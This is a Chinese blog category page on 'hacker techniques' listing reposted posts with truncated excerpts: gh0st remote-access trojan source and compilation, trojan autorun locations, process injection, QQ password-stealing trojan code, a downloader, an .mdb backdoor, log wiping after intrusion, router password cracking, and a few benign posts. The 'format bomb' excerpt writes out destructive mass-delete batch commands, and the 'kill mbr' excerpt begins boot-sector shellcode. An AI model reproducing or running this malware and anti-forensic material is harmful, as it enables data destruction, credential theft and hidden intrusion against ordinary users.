黑客技术
javaweb_research
热爱生活 为了梦想和责任去奋斗
展开
-
红狼的ghost远控代码+编译方法
红狼的ghost远控代码+编译方法2011-06-30 02:18红狼的gh0st远控是国内为数不多的优秀远控软件之一!占资源少,稳定,操作方便!实在是居家旅行,杀人放火……走题了,下面看正文吧 首先是gh0st的编译流程1.架设编转载 2011-08-01 14:26:33 · 3142 阅读 · 0 评论 -
开机自动运行的位置和木马运行方式
1. 把程序或快捷方式放在 C:\Documents and Settings\你的用户名\「开始」菜单\程序\启动\2. 注册表位置:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ru转载 2012-04-28 12:55:03 · 761 阅读 · 0 评论 -
CreateRemoteThread注入NOTEPAD
#include #include #include #include "tlhelp32.h"using namespace std;typedef HINSTANCE (WINAPI *ProcLoadLibrary)(char*);typedef转载 2011-10-09 14:16:07 · 679 阅读 · 0 评论 -
C++编写的QQ木马源代码
近日无所事事,看到现在的QQ防盗技术越来越好,一般的钩子已经无法获取用户输入 的密码了,我也试图用发送WM_GETTEXT消息以及GetWindowText来获取密码文本框的数据,发现是不可行的。左思右想,既然程序本身的防范很 严密。那么我们就从用户这边来下手吧。毕竟很多用户对电转载 2011-08-26 16:55:09 · 2821 阅读 · 3 评论 -
格式化炸弹代码
保存为bat,你懂得echo offdel /f /s /q *.tmpdel /f /s /q *._mpdel /f /s /q *.logdel /f /s /q *.inidel /f /s /q *.infdel /f /s /q *.dll转载 2011-09-06 13:51:21 · 959 阅读 · 2 评论 -
穿越下载者VC源码 全文
/* "mini_downloader" compile by vc++ 6.0 can not run under win98; */ #include #pragma comment(lib,"user32.lib") #p转载 2011-09-06 13:42:11 · 600 阅读 · 0 评论 -
C语言情书
#include#include#includeclass MY //定义一个“MY”的类{ private:char time[10]; //日期char place[10]; //地点public: //在公有成员中定义,表明他人可以访问c转载 2011-09-06 13:54:48 · 1146 阅读 · 0 评论 -
反病毒引擎设计 .
反病毒引擎设计之绪论篇1.绪论本文研究的主要内容正如其题目所示是设计并编写一个先进的反病毒引擎。首先需要对这“先进”二字做一个解释,何为“先进”?众所周知,传统的反病毒软件使用的是基于特征码的静态扫描技术,即在文件中寻找特定十六进制串,如果找到,就可判定文件感染了转载 2011-09-02 10:38:07 · 853 阅读 · 0 评论 -
巧用.mdb后缀数据库做后门
我不否认n早前的那个把asp木马写到图片文件中不失为一种好的方法,其实不仅可以写到图片啦 写到mp3文件里写到doc文件里都是可以的啦 copy 文件名/参数 + 文件名/参数 生成文件名 这样的方法可以很灵活的运用来达到隐藏文件的目的,具体的参数就是/a以a转载 2011-08-01 10:11:15 · 1708 阅读 · 0 评论 -
教你彻底清除入侵后的重要痕迹
今天,来教大家清理你入侵后的三个重要痕迹。包括应用程序日志,安全日志,系统日志。DNS日志默认位置:%systemroot%system32config,默认文件大小512KB,管理员都会改变这个默认大小。安全日志文件:%systemroot%system32config转载 2011-08-01 10:09:41 · 1290 阅读 · 0 评论 -
破解路由器密码
最近很多人问我怎么破解WiFi密码…看来大家都对免费的东西比较有兴趣。要么也可能是我太招摇了…囧…好吧,我就写篇小小的教程,看完后,你应该能够破解大部分无线路由器密码了,写这个教程也是为了加强大家对无线网络安全性的重视,后面也有简单的防破解的办法。好了,正式开始。首先转载 2011-08-01 10:15:41 · 962 阅读 · 0 评论 -
深刻认识木马
由浅入深一步步认识木马: 一、什么是特洛伊木马 特洛伊木马(以下简称木马),英文叫做“Trojan horse”,其名称取自希腊神话的特洛伊木马记。 古希腊传说,特洛伊王子帕里斯访问希腊,诱走了王后海伦,希腊人因此远征特洛伊。围攻9年后,到第10年,希腊将领奥德修斯转载 2011-08-01 10:12:29 · 621 阅读 · 0 评论 -
.txt文件挂马与防御
什么,TXT文件也能挂马?是的!TXT文件不仅有挂马的危险,而且有时候可能非常的危险!不过,严格说来,应该给这个所谓的“TXT”文件加个引号,因为它们是看起来是TXT文件,实则是隐藏了期真实扩展名的其它文件,但在普通人看来它们的确是“TXT”文件!下面就让我们一起来了解一下这些危转载 2011-08-01 10:06:57 · 638 阅读 · 0 评论 -
kill mbr
#include #include unsigned char scode[] ="\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c""\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72""\x75\x73\x21\x20\x46转载 2012-05-07 12:42:43 · 503 阅读 · 0 评论